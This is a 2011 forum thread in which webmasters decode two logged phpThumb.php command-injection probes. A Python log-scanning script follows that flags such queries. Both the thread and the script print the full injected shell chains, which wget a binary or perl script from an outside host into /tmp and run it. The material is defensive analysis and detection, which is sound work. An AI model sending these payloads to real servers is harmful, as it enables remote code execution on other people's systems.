translation?

lucy24

10:48 pm on Dec 27, 2011 (gmt 0)

Can someone who speaks php translate these two queries? Both came attached to requests for (nonexistent) phpThumb.php files. This was a robot wearing street clothes, and it was blocked at the door, so no point to posting in User Agent ID; I'm just curious.

src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;/tmp/barbut6;ps -aux; &phpThumbDebug=9

src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9

Any inherent meaning, or is it the php equivalent of rattling the doorknob to see if it might be unlocked? The IP address in the second version belongs to ThePlanet-- in a range that I blocked ages ago for reasons unknown. I wasn't foolhardy enough to investigate the .co.uk link.

penders

12:31 pm on Dec 28, 2011 (gmt 0)

...rattling the doorknob to see if it might be unlocked?


It certainly looks that way.

I've not used phpThumb.php myself but I would guess that it allows certain parameters to be passed in via the URL - perhaps when unsecured it allows more? It hit the news a while back when a big security hole was found [secunia.com]. Popular with WordPress users.

src = file.jpg
fltr[] = blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f;
phpThumbDebug = 9


If in phpThumbDebug mode 9 (?!) it was allowed to execute this shell script (or any script) on the server then I see potential for disaster. (I think this particular script would try to download a remote perl script and run it on your server!?)

lostdreamer

3:23 pm on Jan 3, 2012 (gmt 0)

Indeed, there is a bug in the phpThumb() function that allows for arbitrary code execution.

What it tries to do:
1)
ls -l /tmp; Show detailed view of files in /tmp
wget -O /tmp/barbut6 bingoooo.co.uk/barbut6; Download file barbut6 from bingoooo.co.uk
chmod 0755 /tmp/barbut6; allow barbut6 to be executed
/tmp/barbut6; Run barbut6
ps -aux; Show all running programs

2)
ls -l /tmp; Show detailed view of files in /tmp
wget -O /tmp/f 67.19.79.203/f; Download file "f" from the IP
killall -9 perl; Kill running program PERL
perl /tmp/f; Run the "f" script with Perl


If you don't have phpThumb.php then you have nothing to worry about.
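An added example, not part of any post in this thread, that does by script what penders and lostdreamer did by hand: it splits a phpThumb.php query string into its parameters, flags a fltr[] value that carries shell metacharacters, and lists the ';'-separated commands that were tacked on after the filter spec, so the same check can be run over an access log. The two sample queries are constructed copies of the ones posted above; the Apache log line and its client address are constructed; the metacharacter list is an assumption about what a legitimate phpThumb filter spec (something like "blur|9") never contains.

```python
"""Flag phpThumb-style command injection in query strings and access-log lines."""
import re
from urllib.parse import unquote_plus

# Assumption: a real phpThumb filter spec looks like "blur|9" and never carries
# these shell metacharacters. The pipe is phpThumb's own separator, so it is
# deliberately not in the list.
METACHARS = re.compile(r"[;`\n]|\$\(|&&")

# Constructed sample inputs: the first two mirror the queries posted in the
# thread, the third is a benign blur filter for comparison.
SAMPLE_QUERIES = [
    "src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; "
    "ls -l /tmp;wget -O /tmp/barbut6 bingoooo.co.uk/barbut6;chmod 0755 /tmp/barbut6;"
    "/tmp/barbut6;ps -aux; &phpThumbDebug=9",
    "src=file.jpg&fltr[]=blur|9 -quality 75 -interlace line fail.jpg jpeg:fail.jpg ; "
    "ls -l /tmp;wget -O /tmp/f 67.19.79.203/f;killall -9 perl;perl /tmp/f; &phpThumbDebug=9",
    "src=file.jpg&fltr[]=blur|3&w=200",
]

# Constructed Apache combined-log line; the client IP is a documentation address.
SAMPLE_LOG_LINE = (
    '203.0.113.5 - - [27/Dec/2011:22:10:03 +0000] '
    '"GET /phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20;ls%20-l%20/tmp;'
    'wget%20-O%20/tmp/f%2067.19.79.203/f;perl%20/tmp/f;&phpThumbDebug=9 HTTP/1.1" '
    '404 210 "-" "Mozilla/4.0"'
)

# Request target inside a combined-log line (method, target, protocol).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def split_parameters(query):
    """Decompose a raw query string into {name: [values]}, percent-decoding both sides.

    Splitting is done by hand on '&' only, so a ';' inside a value is kept
    as part of that value instead of being treated as a pair separator.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name), []).append(unquote_plus(value))
    return params


def shell_commands(value):
    """Return the ';'-separated commands that follow the filter spec.

    The first segment is the filter itself; everything after a ';' would be
    handed to a shell if the value were ever interpolated into a command.
    """
    parts = [p.strip() for p in value.split(";")]
    return [p for p in parts[1:] if p]


def analyze_query(query):
    """Return {'debug': phpThumbDebug value or None, 'findings': {param: [commands]}}."""
    params = split_parameters(query)
    findings = {}
    for name, values in params.items():
        for value in values:
            if METACHARS.search(value):
                findings[name] = shell_commands(value)
    debug = params.get("phpThumbDebug", [None])[0]
    return {"debug": debug, "findings": findings}


def analyze_log_line(line):
    """Pull the request target out of a combined-log line and analyze its query string."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = match.group(1)
    query = target.partition("?")[2]
    return analyze_query(query)


if __name__ == "__main__":
    for q in SAMPLE_QUERIES:
        print(analyze_query(q))
    print(analyze_log_line(SAMPLE_LOG_LINE))
```

Running it prints the decoded parameters and, for the two injected queries, exactly the command lists lostdreamer wrote out; the benign blur filter produces no findings. A request for a phpThumb.php that does not exist is still worth counting in the log, because it tells you which hosts are probing for that script.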